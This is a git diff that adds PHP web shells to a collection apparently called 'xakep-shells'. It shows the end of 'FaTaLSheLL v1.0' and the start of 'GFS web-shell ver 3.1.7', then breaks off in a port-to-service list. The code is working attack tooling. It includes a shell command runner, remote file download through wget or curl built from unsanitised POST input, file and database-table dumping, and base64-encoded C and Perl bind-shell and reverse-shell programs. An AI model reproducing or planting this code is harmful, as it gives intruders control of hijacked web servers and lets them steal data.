+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//end function
+?><?=$header;?>
+<style type="text/css">
+<!--
+.style4 {
+	font-size: x-large;
+	font-weight: bold;
+}
+.style5 {color: #FF0000}
+.style8 {color: #CCFF00}
+-->
+</style>
+
+<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
+<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> �leri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
+<p>&nbsp;</p>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
+      <span class="style8">Fonksiyon K�s�tlamas�:</span> <?php echo $disfunc;?><br>
+      <span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
+      <span class="style8">Durum:</span> <?php echo @$stdata;?></td>
+</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt b/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt
new file mode 100644
index 0000000..98fb031
--- /dev/null
+++ b/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt	
@@ -0,0 +1,618 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// ���������� ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //������ ����������� ������
+$mysql_stat=function_exists('mysql_connect');  //������� mysql
+$curl_on=function_exists('curl_version');      //������� cURL
+$dis_func=ini_get('disable_functions');        //�������������� �������
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
